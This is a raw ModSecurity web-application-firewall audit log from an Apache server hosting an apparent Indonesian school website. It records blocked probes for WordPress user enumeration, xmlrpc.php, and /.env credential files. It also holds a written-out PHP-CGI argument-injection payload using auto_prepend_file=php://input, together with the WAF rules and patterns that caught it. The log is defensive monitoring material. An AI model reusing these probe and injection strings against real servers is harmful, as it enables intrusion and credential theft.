Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746091076416492 6620 (- - -) Stopwatch2: 1746091076416492 6620; combined=4921, p1=617, p2=4009, p3=39, p4=44, p5=121, sr=75, sw=91, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0efce74-Z-- --749b9b1f-A-- [01/May/2025:16:24:43 +0700] aBM92-VeTgVPHjrSAYCUYQAAAAk 103.236.140.4 41418 103.236.140.4 8181 --749b9b1f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --749b9b1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --749b9b1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746091483121513 3519 (- - -) Stopwatch2: 1746091483121513 3519; combined=1519, p1=542, p2=945, p3=0, p4=0, p5=31, sr=131, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --749b9b1f-Z-- --df31831d-A-- [01/May/2025:16:24:46 +0700] aBM93igtr0Qsi1mFAsN4AwAAAIo 103.236.140.4 41430 103.236.140.4 8181 --df31831d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.61 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --df31831d-C-- demo.sayHello --df31831d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --df31831d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746091486001923 6161 (- - -) Stopwatch2: 1746091486001923 6161; combined=4506, p1=598, p2=3676, p3=32, p4=34, p5=97, sr=129, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df31831d-Z-- --da0e2940-A-- [01/May/2025:16:24:47 +0700] aBM934144kZ4LAGlEgxvfQAAANA 103.236.140.4 41440 103.236.140.4 8181 --da0e2940-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.39.9 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.39.9 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --da0e2940-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da0e2940-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746091487490999 790 (- - -) Stopwatch2: 1746091487490999 790; combined=367, p1=322, p2=0, p3=0, p4=0, p5=44, sr=132, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da0e2940-Z-- --809d5500-A-- [01/May/2025:18:14:39 +0700] aBNXn-VeTgVPHjrSAYCdLQAAABg 103.236.140.4 39238 103.236.140.4 8181 --809d5500-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --809d5500-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --809d5500-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746098079777287 3060 (- - -) Stopwatch2: 1746098079777287 3060; combined=1299, p1=419, p2=847, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --809d5500-Z-- --04f6e655-A-- [01/May/2025:18:14:42 +0700] aBNXouVeTgVPHjrSAYCdLwAAAA4 103.236.140.4 39254 103.236.140.4 8181 --04f6e655-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.55 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --04f6e655-C-- demo.sayHello --04f6e655-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --04f6e655-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746098082691359 5174 (- - -) Stopwatch2: 1746098082691359 5174; combined=3600, p1=466, p2=2945, p3=27, p4=30, p5=77, sr=59, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04f6e655-Z-- --388a9e12-A-- [01/May/2025:18:14:46 +0700] aBNXpuVeTgVPHjrSAYCdMgAAAAQ 103.236.140.4 39270 103.236.140.4 8181 --388a9e12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --388a9e12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --388a9e12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746098086646241 2990 (- - -) Stopwatch2: 1746098086646241 2990; combined=1289, p1=419, p2=840, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --388a9e12-Z-- --19ea9539-A-- [01/May/2025:18:14:48 +0700] aBNXqMVMAgMJpNzaVtIndgAAAFM 103.236.140.4 39282 103.236.140.4 8181 --19ea9539-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.194 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --19ea9539-C-- demo.sayHello --19ea9539-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --19ea9539-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746098088833390 5807 (- - -) Stopwatch2: 1746098088833390 5807; combined=4301, p1=534, p2=3539, p3=29, p4=31, p5=100, sr=71, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19ea9539-Z-- --8ac1c303-A-- [01/May/2025:18:18:47 +0700] aBNYl4144kZ4LAGlEgx24QAAAMg 103.236.140.4 40334 103.236.140.4 8181 --8ac1c303-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8ac1c303-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ac1c303-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746098327854806 2851 (- - -) Stopwatch2: 1746098327854806 2851; combined=1251, p1=433, p2=783, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ac1c303-Z-- --476c612b-A-- [01/May/2025:18:18:50 +0700] aBNYmsVMAgMJpNzaVtInvwAAAEc 103.236.140.4 40350 103.236.140.4 8181 --476c612b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.150 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --476c612b-C-- demo.sayHello --476c612b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --476c612b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746098330617735 5826 (- - -) Stopwatch2: 1746098330617735 5826; combined=4729, p1=596, p2=3892, p3=39, p4=44, p5=94, sr=76, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --476c612b-Z-- --0749fe59-A-- [01/May/2025:18:23:00 +0700] aBNZlOVeTgVPHjrSAYCd-wAAAAg 103.236.140.4 41294 103.236.140.4 8181 --0749fe59-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0749fe59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0749fe59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746098580673482 2701 (- - -) Stopwatch2: 1746098580673482 2701; combined=1400, p1=457, p2=912, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0749fe59-Z-- --08ef4144-A-- [01/May/2025:18:23:05 +0700] aBNZmY144kZ4LAGlEgx3GgAAAM8 103.236.140.4 41318 103.236.140.4 8181 --08ef4144-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.3 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --08ef4144-C-- demo.sayHello --08ef4144-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --08ef4144-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746098585670234 4990 (- - -) Stopwatch2: 1746098585670234 4990; combined=3886, p1=444, p2=3229, p3=29, p4=25, p5=92, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08ef4144-Z-- --fcb0ed0e-A-- [01/May/2025:19:46:06 +0700] aBNtDuVeTgVPHjrSAYCjSwAAABA 103.236.140.4 60420 103.236.140.4 8181 --fcb0ed0e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.234 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Charset: utf-8 --fcb0ed0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcb0ed0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746103566929468 763 (- - -) Stopwatch2: 1746103566929468 763; combined=365, p1=331, p2=0, p3=0, p4=0, p5=34, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcb0ed0e-Z-- --bfe4492f-A-- [01/May/2025:21:13:50 +0700] aBOBnuVeTgVPHjrSAYCw-AAAABM 103.236.140.4 43712 103.236.140.4 8181 --bfe4492f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 194.163.159.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --bfe4492f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfe4492f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746108830126021 824 (- - -) Stopwatch2: 1746108830126021 824; combined=389, p1=349, p2=0, p3=0, p4=0, p5=40, sr=150, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfe4492f-Z-- --5c345e33-A-- [01/May/2025:21:14:23 +0700] aBOBv-VeTgVPHjrSAYCxLAAAAAg 103.236.140.4 44230 103.236.140.4 8181 --5c345e33-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 194.163.159.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65 Accept-Charset: utf-8 --5c345e33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c345e33-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746108863429740 536 (- - -) Stopwatch2: 1746108863429740 536; combined=207, p1=177, p2=0, p3=0, p4=0, p5=30, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c345e33-Z-- --a31a0910-A-- [01/May/2025:21:32:25 +0700] aBOF-eVeTgVPHjrSAYC3fQAAAAI 103.236.140.4 60664 103.236.140.4 8181 --a31a0910-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.39.9 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.39.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --a31a0910-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a31a0910-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746109945701200 766 (- - -) Stopwatch2: 1746109945701200 766; combined=359, p1=322, p2=0, p3=0, p4=0, p5=36, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a31a0910-Z-- --7ec5ae44-A-- [02/May/2025:02:19:21 +0700] aBPJOSgtr0Qsi1mFAsOmSQAAAIw 103.236.140.4 50282 103.236.140.4 8181 --7ec5ae44-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Charset: utf-8 --7ec5ae44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ec5ae44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746127161632509 673 (- - -) Stopwatch2: 1746127161632509 673; combined=296, p1=254, p2=0, p3=0, p4=0, p5=42, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ec5ae44-Z-- --7da6f626-A-- [02/May/2025:02:56:57 +0700] aBPSCcVMAgMJpNzaVtJYxgAAAEA 103.236.140.4 58934 103.236.140.4 8181 --7da6f626-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --7da6f626-C-- --7da6f626-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7da6f626-E-- --7da6f626-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746129417255316 3753 (- - -) Stopwatch2: 1746129417255316 3753; combined=2578, p1=472, p2=2070, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
